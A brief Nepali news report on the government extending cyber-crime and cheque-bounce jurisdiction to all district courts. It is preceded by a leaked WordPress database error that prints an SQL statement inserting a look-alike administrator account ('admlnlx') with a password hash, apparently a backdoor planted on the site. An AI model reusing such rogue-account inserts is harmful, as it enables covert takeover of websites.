WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeBa1m7ITP9yngnGD.Wd4lfuEW0lvC0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:19:25', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सरकारले साइबर क्राइम र चेक बाउन्स मुद्दा हेर्ने सबै जिल्ला अदालतलाई
जिम्मा दिने निर्णय गरेको छ । मन्त्रिपरिषद्को बैठकबाट उक्त निर्णय गरिएको हो ।
यसअघि सो मुद्दा हेर्ने जिम्मा उच्च, सर्वोच्चका साथै सरकारले तोकेका निश्चित जिल्ला अदालतलाई मात्रै थियो ।
यस्ता मुद्दा काठमाडौं केन्द्रित हुन थालेपछि सरकारले सबै जिल्लामै अधिकार दिने निर्णय गरेको हो । साइबर क्राइम र चेक बाउन्स मुद्दाको संख्या बढ्दै गएको तर हेर्ने जिम्मा निश्चित अदालतमा रहेकाले सेवाग्राहीले गुनासो गरिरहेका थिए ।